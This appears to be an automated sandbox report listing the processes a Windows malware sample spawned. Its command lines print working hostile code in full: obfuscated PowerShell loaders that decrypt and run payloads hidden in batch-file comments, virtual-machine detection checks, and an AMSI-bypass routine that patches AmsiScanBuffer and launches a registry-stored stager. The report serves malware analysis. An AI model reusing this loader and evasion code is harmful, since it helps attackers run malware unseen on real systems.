Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:41:59
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:41:59
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff78ee20000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:41:59
Start date:	04/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase:	0x7ff624f90000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:42:00
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff78ee20000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:42:00
Start date:	04/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff624f90000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:42:02
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Imagebase:	0x7ff7183f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:42:02
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:42:08
Start date:	04/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444
Imagebase:	0x7ff79b100000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:42:33
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff7183f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:42:33
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:42:33
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Imagebase:	0x7ff7183f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:42:33
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff72bec0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 1712, Parent PID: 5216

General

Target ID:	19
Start time:	03:42:34
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Imagebase:	0x7ff7183f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	03:42:34
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	03:42:34
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff78ee20000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:42:34
Start date:	04/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Imagebase:	0x7ff624f90000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:42:35
Start date:	04/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff78ee20000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:42:35
Start date:	04/10/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff624f90000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:42:57
Start date:	04/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Imagebase:	0x7ff7183f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	03:42:57
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Analysis Process: WerFault.exePID: 412, Parent PID: 4828

General

Target ID:	28
Start time:	03:43:03
Start date:	04/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096
Imagebase:	0x7ff79b100000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	03:43:08
Start date:	04/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380
Imagebase:	0x7ff79b100000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	03:43:08
Start date:	04/10/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	03:43:08
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	03:43:11
Start date:	04/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0x330000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	03:43:11
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	03:43:11
Start date:	04/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0x330000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	03:43:11
Start date:	04/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crUBwWNbWsKMjsxdFIT=aMvXsEUhmbVC @([String])([IntPtr]);$CpOqYoEODudajRwpdwKjEO=aMvXsEUhmbVC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xRGvgkyzmYH=$SWnYXVUkgpflw.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$PWtaGkrbiCHSQK=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$wJqytHrusrDKQVuUA=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$CBvLQPx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invoke($Null,@([Object]$CBvLQPx,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+'a'+'nB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$GtTUGmXcNy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,4,[ref]$GtTUGmXcNy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SjReXwPFwLrQCguSY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,0x20,[ref]$GtTUGmXcNy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](45)+''+'s'+'t'+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	03:43:11
Start date:	04/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	03:43:13
Start date:	04/10/2024
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Imagebase:	0x7ff70f330000
File size:	21'312 bytes
MD5 hash:	08EB78E5BE019DF044C26B14703BD1FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	03:43:13
Start date:	04/10/2024
Path:	C:\Windows\System32\winlogon.exe
Wow64 process (32bit):	false
Commandline:	winlogon.exe
Imagebase:	0x7ff7cd660000
File size:	906'240 bytes
MD5 hash:	F8B41A1B3E569E7E6F990567F21DCE97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	40
Start time:	03:43:13
Start date:	04/10/2024
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff7a2ae0000
File size:	59'456 bytes
MD5 hash:	A1CC00332BBF370654EE3DC8CDC8C95A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	03:43:14
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	03:43:15
Start date:	04/10/2024
Path:	C:\Windows\System32\dwm.exe
Wow64 process (32bit):	false
Commandline:	"dwm.exe"
Imagebase:	0x7ff74e710000
File size:	94'720 bytes
MD5 hash:	5C27608411832C5B39BA04E33D53536C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	03:43:16
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	44
Start time:	03:43:17
Start date:	04/10/2024
Path:	C:\Windows\System32\svchost.exe
